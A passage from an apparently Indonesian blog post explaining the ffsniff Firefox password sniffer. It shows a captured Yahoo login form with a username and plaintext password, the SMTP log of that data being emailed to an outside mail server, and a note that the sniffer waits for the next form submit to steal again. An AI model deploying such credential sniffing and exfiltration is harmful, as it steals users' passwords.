    hidden:.challenge:7FWzfTnmnC3Njv1YadcWnM61LyIw
    hidden:hasMsgr:0
    hidden:.chkP:Y
    hidden:.done:http://my.yahoo.com
    hidden:.pd:_ver=0&c=&ivt=&sg=
    text:login:rizkiwicaksono
    password:passwd:inipasswordakujuga
    checkbox:.persistent:y
    submit:.save:Sign In
    .
    250 OK id=1LeiW6-0002zu-LA
    QUIT
    221 gator669.hostgator.com closing connection
    Dengan selesainya eksekusi send_data() maka ffsniff telah selesai menjalankan tugasnya mengirim email. Selanjutnya ffsniff akan “tidur” menunggu dipanggil oleh event submit dan mulai kembali proses penyadapan password.
IP
advertiser

CBox :D

FANS PAGE

Change Language

DAFTAR ISI

SMS GRATIS

Langganan Artikel

Enter your email address:

Delivered by FeedBurner

Categories

Search Engine OptimizationSubmit Express